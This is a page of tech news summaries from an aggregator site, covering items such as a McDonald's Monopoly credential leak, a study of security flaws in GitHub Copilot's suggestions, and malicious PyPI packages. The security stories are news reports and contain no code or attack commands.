Security

McDonald's Leaks Password For Monopoly VIP Database To Winners (bleepingcomputer.com) 33

A bug in the McDonald's Monopoly VIP game in the United Kingdom caused the login names and passwords for the game's database to be sent to all winners. BleepingComputer reports: After skipping a year due to COVID-19, McDonald's UK launched their popular Monopoly VIP game on August 25th, where customers can enter codes found on purchase food items for a chance to win a prize. These prizes include 100,000 pounds in cash, an Ibiza villa or UK getaway holiday, Lay-Z Spa hot tubs, and more. Unfortunately, the game hit a snag over the weekend after a bug caused the user name and passwords for both the production and staging database servers to be in prize redemption emails sent to prize winners.

An unredacted screenshot of the email sent to prize winners was shared with BleepingComputer by Troy Hunt that shows an exception error, including sensitive information for the web application. This information included hostnames for Azure SQL databases and the databases' login names and passwords, as displayed in the redacted email below sent to a Monopoly VIP winner. The prize winner who shared the email with Troy Hunt said that the production server was firewalled off but that they could access the staging server using the included credentials. As these databases may have contained winning prize codes, it could have allowed an unscrupulous person to download unused game codes to claim the prizes. Luckily for McDonald's, the person responsibly disclosed the issue with McDonald's, and while they did not receive a response, they later found that the staging server's password was soon changed.

Programming

Developer Returns To Game After Four Decades, Discovers and Fixes Typo So It Works (tomsguide.com) 98

joshuark writes: Harry McCracken is not the name of a Cold War superspy, but a man who is now the tech editor of Fast Company and, in his younger days, a developer of games for Radio Shack's TRS-80 microcomputer. McCracken, who is also a regular Slashdot reader, recently went back to have a look at his first game, Arctic Adventure, which he wrote when he was 16 around 1980-81 -- a text adventure inspired by the work of Scott Adams in particular, a pioneering designer of the Adventure series of games for the TRS-80.

As was common in the 80s, Arctic Adventure was distributed in book form. This was The Captain 80 Book of BASIC Adventures: pages of type-it-yourself BASIC code, each entry its own adventure game. [...] "Decades later, I didn't spend much time thinking about Arctic Adventure, but I never forgot the fact that I hadn't received a copy of the Captain 80 book. Thanks to the internet, I eventually acquired one. But typing in five-and-a-half pages of old BASIC code seemed onerous, even if it was code I'd written."

McCracken eventually got around to it this July. "After five or six tedious typing sessions on my iPad, I had Arctic Adventure restored to digital form. That was when I made an alarming discovery: As printed in the Captain 80 book, the game wasn't just unwinnable, but unplayable. It turned out that it had a 1981 typo that consisted of a single missing '0' in a character string. It was so fundamental a glitch that it rendered the game's command of the English language inoperable. You couldn't GET SHOVEL let alone complete the adventure."

The Courts

GitHub Files Court Brief Criticizing 'Vague Infringement Allegations' (github.blog) 24

"One project going dark — due to a DMCA takedown or otherwise — can impact thousands of developers," GitHub warns in a blog post this week: We saw that firsthand with both leftpad and mimemagic. That's why GitHub's designed its DMCA process to follow the law in requiring takedown requests to identify specific content. We want developers on our platform and elsewhere to have a clear opportunity to remove infringing code yet keep non-infringing code up for others to use, modify, and learn from.

Ensuring that software copyright allegations are specific and actionable benefits the entire developer ecosystem. That's why GitHub submitted a "friend of the court" brief in the SAS Institute, Inc. v. World Programming Ltd. case before a Federal Court of Appeals.

This case is the most recent in a ten-year litigation spanning both the UK and the US. SAS Institute has brought copyright and non-copyright claims against World Programming's software that runs code written in the SAS language, and the copyright claims drew comparison to the recent Google v. Oracle Supreme Court case. But this case is different from Google v. Oracle because here the alleged copyright infringement is based on a claim of "nonliteral" infringement. That means there is no allegation that specific lines of code were literally copied, but only that other aspects, like the code's overall structure and organization, were used. In nonliteral infringement claims, the questions arise: what aspects of the "nonliteral" features were taken and are they actually protected by copyright...?

GitHub believes that for claims involving nonliteral copying of software, it is critical that a copyright owner provide — as early as possible — examples that would allow a developer, a court, or a software collaboration platform like GitHub to identify what was claimed to be copied. Our brief helps educate the court why specificity is especially important for developers.... We urged the court to think about efficiency in dispute resolution to avoid FUD (fear, uncertainty, and doubt). The sooner infringement allegations can be made specific and clear, the sooner infringing code can be changed and non-infringing code can stay up. That should be the result for both federal lawsuits, as well as DMCA infringement notices.

Microsoft

Microsoft Previews Free Visual Studio Code for the Web (theregister.com) 33

Microsoft is previewing Visual Studio Code for the Web, a code editor that runs entirely in the browser. The Register: The post introducing the new service was put up yesterday but is returning "page not found" at the time of writing, so possibly was published prematurely. But it is expected to return soon, since the technology looks the same as that already introduced by Microsoft-owned GitHub as the web-based editor.

The difference is that GitHub's version only works in a GitHub repository, where it is opened by pressing the dot key. By contrast, Microsoft stated: "Everyone can use VS Code for the Web for free at https://vscode.dev to quickly open and browse source code hosted on GitHub and on your local machine (and soon on Azure Repos), and make and commit lightweight changes."

Google

Google Play App Store Revenue Hit $11.2 Billion in 2019, Lawsuit Says (reuters.com) 9

Alphabet's Google generated $11.2 billion in revenue from its mobile app store in 2019, according to a court filing unsealed on Saturday, offering a clear view into the service's financial results for the first time. From a report: Attorneys general for Utah and 36 other U.S. states or districts suing Google over alleged antitrust violations with the app store also said in the newly unredacted filing that the business in 2019 had $8.5 billion in gross profit and $7 billion in operating income, for an operating margin of over 62%. The figures include sales of apps, in-app purchase and app store ads. Google told Reuters the data "are being used to mischaracterize our business in a meritless lawsuit."

The company and its accusers said in a separate filing on Saturday a trial in late 2022 is possible over whether Google abuses its alleged monopoly in app sales for Android devices. In its quarterly financial disclosures, Google groups Play app revenue with that of other services and accounts for the store's ad revenue as part of another broader category. Attorneys general, as well as mobile app developer Epic Games and others separately suing Google, have contended that it generates huge profits through the Play Store by taking 30% of the fee for every digital good sold inside an app. The plaintiffs say Google's cut is arbitrarily high, siphoning app developers' profits.

AI

40% of GitHub's Copilot's Suggestions Had Security Vulnerabilties, Study Finds (visualstudiomagazine.com) 24

"Academic researchers discover that nearly 40% of the code suggestions by GitHub's Copilot tool are erroneous, from a security point of view..." writes TechRadar: To help quantify the value-add of the system, the academic researchers created 89 different scenarios for Copilot to suggest code for, which produced over 1600 programs. Reviewing them, the researchers discovered that almost 40% were vulnerable in one way or another...

Since Copilot draws on publicly available code in GitHub repositories, the researchers theorize that the generated vulnerable code could perhaps just be the result of the system mimicking the behavior of buggy code in the repositories. Furthermore, the researchers note that in addition to perhaps inheriting buggy training data, Copilot also fails to consider the age of the training data. "What is 'best practice' at the time of writing may slowly become 'bad practice' as the cybersecurity landscape evolves."

Visual Studio magazine highlights another concern. 39.33 percent of the top options were vulnerable, the paper noted, adding that "The security of the top options are particularly important — novice users may have more confidence to accept the 'best' suggestion...." "There is no question that next-generation 'auto-complete' tools like GitHub Copilot will increase the productivity of software developers," the authors (Hammond Pearce, Baleegh Ahmad, Benjamin Tan, Brendan Dolan-Gavitt and Ramesh Karri) say in conclusion.

"However, while Copilot can rapidly generate prodigious amounts of code, our conclusions reveal that developers should remain vigilant ('awake') when using Copilot as a co-pilot. Ideally, Copilot should be paired with appropriate security-aware tooling during both training and generation to minimize the risk of introducing security vulnerabilities.

Businesses

Apple Will Now let App Store Developers Talk To Their Customers About Buying Direct (techcrunch.com) 19

Apple announced today it has reached a proposed settlement in a lawsuit filed against it by developers in the United States. The agreement, which is still pending court approval, includes a few changes, the biggest one being that developers will be able to share information on how to pay for purchases outside of their iOS app or the App Store -- which means they can tell customers about payment options that aren't subject to Apple commissions. The settlement also includes more pricing tiers and a new transparency report about the app review process. From a report: The class-action lawsuit was filed against Apple in 2019 by app developers Donald Cameron and Illinois Pure Sweat Basketball, who said the company engaged in anticompetitive practices by only allowing the downloading of iPhone apps through its App Store. In today's announcement, Apple said it is "clarifying that developers can use communications, such as emails, to share information about payment methods outside of their iOS app. As always, developers will not pay Apple a commission on any purchases taking place outside of their app or the App Stores."
Java

Alphabet's Drones Delivered 10,000 Cups of Coffee, 1,200 Roast Chickens In the Last Year (cnbc.com) 30

Alphabet's drone company Wing delivered 10,000 cups of coffee, 1,700 snack packs and 1,200 roast chickens to customers in Logan, Australia, over the last year, the company said Wednesday in a blog post outlining its progress. CNBC reports: Wing was launched in 2019 in Australia, following a series of drone tests that began in 2014. The service, which was initially part of Alphabet's experimental research division, allows users to order items such as food through a mobile app and is fast approaching 100,000 deliveries since its launch. Wing hopes to one day deliver products to people all over the world without having to rely on drivers or delivery trucks like other companies.

The company works with more than 30 partners globally, including local coffee shops and national brands such as Walgreens, according to a February blog post. Local businesses can also reach out directly to the company to get involved. In 2020, Wing partnered with a Virginia school district to deliver library books during the pandemic.

Programming

Turns Out The Hardest Part of Making a Game is Everything (ign.com) 88

Game devs of all sizes and scopes respond to the question: "What is a thing in video games that seems simple but is actually extremely hard to make?" From a report: Earlier this year, game developers across the industry weighed in on Twitter on a seemingly innocuous question: What's the problem with doors in video games? It turns out, a lot. A seemingly boring feature such as usable doors can be absolute hell for developers to put in their games for numerous reasons. Everything from physics to functionality, from AI to sound, comes into play while making a single door in a single video game work. And not just work, but work in such a way where the player never has to think about it. Building a working, forgettable door is an incredible game development undertaking. But it will probably not surprise you to learn that doors are far from the only seemingly simple feature that prove to be unexpectedly challenging in the development process.

A few months ago, I asked developers across the industry the question, "What is a thing in video games that seems simple but is actually extremely hard for game developers to make?" I received nearly 100 responses representing a wide breadth of industry experience, ranging from solo developers to those who had tackled issues within teams of hundreds. The pool of responses similarly included a number of varied problems, but also a number of similar issues popping up among many projects. Those I spoke to described challenges in making games look and sound good, storytelling, movement and interaction with objects, menus, save systems, multiplayer, and all sorts of intricacies of design that are so rarely discussed outside of studios themselves. Many noted that they've received angry player feedback about the topics they mentioned, with their audiences asking, "Why don't you just do X?" The answer is, almost always: because it's really, really hard.

So if you've ever wondered why the maker of your favorite game didn't simply fix one of the myriad issues developers mentioned below, here's why those seemingly simple problems are hardly simple at all. As the original topic of game development headaches focused on doors, it made sense that many of the developers I spoke to had issues with other methods used to connect a person from one place to another. For instance, elevators. Multiple developers told me about the frustrations of elevators, whether they're taking players up a single floor in a building or serving as pseudo-loading screens between two major game areas. [...]

Microsoft

A Decade Later, .NET Developers Still Fear Being 'Silverlighted' By Microsoft (visualstudiomagazine.com) 125

the_insult_dog writes: Some 10 years after the final Microsoft Silverlight release, some developers still fear being 'Silverlighted,' or seeing a development product in which they have invested heavily be abandoned by Microsoft.

Microsoft will tell you that official support for Silverlight will end in less than two months, on Oct. 12, 2021. Anyone in the industry will tell you it effectively died around 2011 when the last version, Silverlight 5, was made available for download. Speculation about its demise arose around the same time.

Security

Secret Terrorist Watchlist With 2 Million Records Exposed Online (bleepingcomputer.com) 87

A secret terrorist watchlist with 1.9 million records, including classified "no-fly" records was exposed on the internet. The list was left accessible on an Elasticsearch cluster that had no password on it. BleepingComputer reports: July this year, Security Discovery researcher Bob Diachenko came across a plethora of JSON records in an exposed Elasticsearch cluster that piqued his interest. The 1.9 million-strong recordset contained sensitive information on people, including their names, country citizenship, gender, date of birth, passport details, and no-fly status. The exposed server was indexed by search engines Censys and ZoomEye, indicating Diachenko may not have been the only person to come across the list.

The researcher discovered the exposed database on July 19th, interestingly, on a server with a Bahrain IP address, not a US one. However, the same day, he rushed to report the data leak to the U.S. Department of Homeland Security (DHS). "I discovered the exposed data on the same day and reported it to the DHS." "The exposed server was taken down about three weeks later, on August 9, 2021." "It's not clear why it took so long, and I don't know for sure whether any unauthorized parties accessed it," writes Diachenko in his report. The researcher considers this data leak to be serious, considering watchlists can list people who are suspected of an illicit activity but not necessarily charged with any crime. "In the wrong hands, this list could be used to oppress, harass, or persecute people on the list and their families." "It could cause any number of personal and professional problems for innocent people whose names are included in the list," says the researcher.

Java

Report: Java 'Surges' Back Up in Programming Language Popularity (zdnet.com) 60

"The programming language Java's popularity has been slowly declining in some programming language index rankings, but it's popped back into the second spot in RedMonk's latest chart," reports ZDNet: Javascript still rules in RedMonk's Q3 2021 language popularity rankings, which have been updated twice a year since 2010.

Python overtook Java for the second spot in RedMonk's Q2 2020 ranking, and Java has remained there in Python's shadow ever since, but now it has jumped one spot to second — a place it once again shares with Python. As RedMonk analyst Stephen O'Grady notes, Java's consistent third placing over the past year was "prompting questions from observers as to whether it was fated to a gradual drift down these rankings".

Tiobe's CEO Paul Jensen last September said Java was in "real trouble" because of a notable decline in its share of queries for programming languages on major search engines. But now, according to RedMonk, Java has 'surged' back. "This would be less of a surprise but for many of the language's competitors — and, it should be said, the odd industry analyst or two — writing regularly recurring epitaphs for the stalwart of enterprise infrastructure," said O'Grady.

The article also reports that Google's Dart programming language "made its debut in RedMonk's top 20 this month and displaced Perl."
Programming

OpenAI's Codex Turns Written Language Into Computer Code 69

A new AI system can read written instructions in conversational language and transform it into working computer code. From a report: The model is the latest example of progress in natural language processing (NLP), the ability of AIs to read and write text. But it also points towards a future where coders will be able to offload some of their work to AIs, and where ordinary people may be able to code without actually learning how to code.

Today OpenAI is releasing an improved version of its Codex AI model and releasing it for developers for private developers through its API. Codex is a descendant of OpenAI's massive text-generating model GPT-3, which was released last summer. But while GPT-3 was trained on a huge quantity of language data taken from the internet -- enabling it to read and then complete text prompts submitted by a human user -- Codex was trained on both language and billions of lines of publicly available computer code.
Microsoft

Microsoft is Recruiting US Teens To Be Influencers on Social Media for Its Educational Coding Platform (twitter.com) 33

Long-time Slashdot reader theodp writes: Just ahead of the new school year, Microsoft and its nonprofit partner Code.org took to Twitter to recruit teens for Microsoft's inaugural MakeCode Insiders Program. Microsoft MakeCode is a code platform that allows kids to write programs for a wide variety of applications even if they have little or no previous coding experience; there's also a College Board-endorsed MakeCode AP CS curriculum, which can earn high school students college credit...

MakeCode Insiders, Microsoft adds, will be recognized for completing key milestones with badges, including MakeCode Influencer ("This badge is earned when a MakeCode Wizard is chosen to represent our product to teens on social media."). MakeCode Influencers, Microsoft explains, "are teens who have graduated from the Insiders program and are selected to represent MakeCode on social media in various forms...

Insider applications are due today, kids!

This is Microsoft's first time running the "Insider" program, and the guidebook promises the larger program's Insiders "will focus on MakeCode Arcade, a coding editor for retro-style video games, offering feedback and ideas that will inform product decision."
Programming

Are Python Libraries Riddled With Security Holes? (techradar.com) 68

"Almost half of the packages in the official Python Package Index (PyPI) repository have at least one security issue," reports TechRadar, citing a new analysis by Finnish researchers, which even found five packages with more than a thousand issues each... The researchers used static analysis to uncover the security issues in the open source packages, which they reason end up tainting software that use them. In total the research scanned through 197,000 packages and found more than 749,000 security issues in all... Explaining their methodology the researchers note that despite the inherent limitations of static analysis, they still found at least one security issue in about 46% of the packages in the repository. The paper reveals that of the issues identified, the maximum (442,373) are of low severity, while 227,426 are moderate severity issues. However, 11% of the flagged PyPI packages have 80,065 high severity issues.
The Register supplies some context: Other surveys of this sort have come to similar conclusions about software package ecosystems. Last September, a group of IEEE researchers analyzed 6,673 actively used Node.js apps and found about 68 per cent depended on at least one vulnerable package... The situation is similar with package registries like Maven (for Java), NuGet (for .NET), RubyGems (for Ruby), CPAN (for Perl), and CRAN (for R). In a phone interview, Ee W. Durbin III, director of infrastructure at the Python Software Foundation, told The Register, "Things like this tend not to be very surprising. One of the most overlooked or misunderstood parts of PyPI as a service is that it's intended to be freely accessible, freely available, and freely usable. Because of that we don't make any guarantees about the things that are available there..."

Durbin welcomed the work of the Finnish researchers because it makes people more aware of issues that are common among open package management systems and because it benefits the overall health of the Python community. "It's not something we ignore but it's also not something we historically have had the resources to take on," said Durbin. That may be less of an issue going forward. According to Durbin, there's been significantly more interest over the past year in supply chain security and what companies can do to improve the situation. For the Python community, that's translated into an effort to create a package vulnerability reporting API and the Python Advisory Database, a community-run repository of PyPI security advisories that's linked to the Google-spearheaded Open Vulnerability Database.

Programming

Free Software Foundation Will Fund Papers on Issues Around Microsoft's 'GitHub Copilot' (fsf.org) 111

GitHub's new "Copilot" tool (created by Microsoft and OpenAI) shares the autocompletion suggestions of an AI trained on code repositories. But can that violate the original coder's license? Now the Free Software Foundation (FSF) is calling for a closer look at these and many other issues...

"We already know that Copilot as it stands is unacceptable and unjust, from our perspective," they wrote in a blog post this week, arguing that Copilot "requires running software that is not free/libre (Visual Studio, or parts of Visual Studio Code), and Copilot is Service as a Software Substitute. These are settled questions as far as we are concerned."

"However, Copilot raises many other questions which require deeper examination..." The Free Software Foundation has received numerous inquiries about our position on these questions. We can see that Copilot's use of freely licensed software has many implications for an incredibly large portion of the free software community. Developers want to know whether training a neural network on their software can really be considered fair use. Others who may be interested in using Copilot wonder if the code snippets and other elements copied from GitHub-hosted repositories could result in copyright infringement. And even if everything might be legally copacetic, activists wonder if there isn't something fundamentally unfair about a proprietary software company building a service off their work.

With all these questions, many of them with legal implications that at first glance may have not been previously tested in a court of law, there aren't many simple answers. To get the answers the community needs, and to identify the best opportunities for defending user freedom in this space, the FSF is announcing a funded call for white papers to address Copilot, copyright, machine learning, and free software.

We will read the submitted white papers, and we will publish ones that we think help elucidate the problem. We will provide a monetary reward of $500 for the papers we publish.

They add that the following questions are of particular interest:
  • Is Copilot's training on public repositories infringing copyright? Is it fair use?
  • How likely is the output of Copilot to generate actionable claims of violations on GPL-licensed works?
  • How can developers ensure that any code to which they hold the copyright is protected against violations generated by Copilot?
  • Is there a way for developers using Copilot to comply with free software licenses like the GPL?
  • If Copilot learns from AGPL-covered code, is Copilot infringing the AGPL?
  • If Copilot generates code which does give rise to a violation of a free software licensed work, how can this violation be discovered by the copyright holder on the underlying work?
  • Is a trained artificial intelligence (AI) / machine learning (ML) model resulting from machine learning a compiled version of the training data, or is it something else, like source code that users can modify by doing further training?
  • Is the Copilot trained AI/ML model copyrighted? If so, who holds that copyright?
  • Should ethical advocacy organizations like the FSF argue for change in copyright law relevant to these questions?

Education

Texas Instruments' New Calculator Will Run Programs Written in Python (dallasnews.com) 126

"Dallas-based Texas Instruments' latest generation of calculators is getting a modern-day update with the addition of programming language Python," reports the Dallas Morning News: The goal is to expand students' ability to explore science, technology, engineering and math through the device that's all-but-required in the nation's high schools and colleges...

Though most of the company's $14 billion in annual revenue comes from semiconductors, its graphing calculator remains its most recognized consumer product. This latest TI-84 model, priced between $120 to $160 depending on the retailer, was made to accommodate the increasing importance of programming in the modern world.

Judging by photos in their press release, an "alpha" key maps the calculator's keys to the letters of the alphabet (indicated with yellow letters above each key). One page on its web site also mentions "Menu selections" that "help students with discovery and syntax." (And the site confirms the calculator will "display expressions, symbols and fractions just as you write them.")

There's even a file manager that "gives quick access to Python programs you have saved on your calculator. From here, you can create, edit, run and manage your files." And one page also mentions something called TI Connect CE software application, which "connects your computer and graphing calculator so they can talk to each other. Use it to transfer data, update your operating system, download calculator software applications or take screenshots of your graphing calculator."

I'm sure Slashdot's readers have some fond memories of their first calculator. But these new models have a full-color screen and a rechargeable battery that can last up to a month on a single charge. And Texas Instruments seems to think they could even replace computers in the classroom. "By adding Python to the calculators many students are already familiar with and use in class, we are making programming more accessible and approachable for all students," their press release argues, "eliminating the need for teachers to reserve separate computer labs to teach these important skills.
Programming

After YouTube-dl Incident, GitHub's DMCA Process Now Includes Free Legal Help (venturebeat.com) 30

"GitHub has announced a partnership with the Stanford Law School to support developers facing takedown requests related to the Digital Millennium Copyright Act (DMCA)," reports VentureBeat: While the DMCA may be better known as a law for protecting copyrighted works such as movies and music, it also has provisions (17 U.S.C. 1201) that criminalize attempts to circumvent copyright-protection controls — this includes any software that might help anyone infringe DMCA regulations. However, as with the countless spurious takedown notices delivered to online content creators, open source coders too have often found themselves in the DMCA firing line with little option but to comply with the request even if they have done nothing wrong. The problem, ultimately, is that freelance coders or small developer teams often don't have the resources to fight DMCA requests, which puts the balance of power in the hands of deep-pocketed corporations that may wish to use DMCA to stifle innovation or competition. Thus, GitHub's new Developer Rights Fellowship — in conjunction with Stanford Law School's Juelsgaard Intellectual Property and Innovation Clinic — seeks to help developers put in such a position by offering them free legal support.

The initiative follows some eight months after GitHub announced it was overhauling its Section 1201 claim review process in the wake of a takedown request made by the Recording Industry Association of America (RIAA), which had been widely criticized as an abuse of DMCA... [M]oving forward, whenever GitHub notifies a developer of a "valid takedown claim," it will present them with an option to request free independent legal counsel.

The fellowship will also be charged with "researching, educating, and advocating on DMCA and other legal issues important for software innovation," GitHub's head of developer policy Mike Linksvayer said in a blog post, along with other related programs.

Explaining their rationale, GitHub's blog post argues that currently "When developers looking to learn, tinker, or make beneficial tools face a takedown claim under Section 1201, it is often simpler and safer to just fold, removing code from public view and out of the common good.

"At GitHub, we want to fix this."
Security

Software Downloaded 30,000 Times From PyPI Ransacked Developers' Machines (arstechnica.com) 26

Open source packages downloaded an estimated 30,000 times from the PyPI open source repository contained malicious code that surreptitiously stole credit card data and login credentials and injected malicious code on infected machines, researchers said on Thursday. Ars Technica reports: In a post, researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe of devops software vendor JFrog said they recently found eight packages in PyPI that carried out a range of malicious activity. Based on searches on https://pepy.tech, a site that provides download stats for Python packages, the researchers estimate the malicious packages were downloaded about 30,000 times. [...] Different packages from Thursday's haul carried out different kinds of nefarious activities. Six of them had three payloads, one for harvesting authentication cookies for Discord accounts, a second for extracting any passwords or payment card data stored by browsers, and the third for gathering information about the infected PC, such as IP addresses, computer name, and user name. The remaining two packages had malware that tries to connect to an attacker-designated IP address on TCP port 9009, and to then execute whatever Python code is available from the socket. It's not now known what the IP address was or if there was malware hosted on it.

Like most novice Python malware, the packages used only a simple obfuscation such as from Base64 encoders. Karas told me that the first six packages had the ability to infect the developer computer but couldn't taint the code developers wrote with malware. "For both the pytagora and pytagora2 packages, which allows code execution on the machine they were installed, this would be possible." he said in a direct message. "After infecting the development machine, they would allow code execution and then a payload could be downloaded by the attacker that would modify the software projects under development. However, we don't have evidence that this was actually done."

Slashdot Top Deals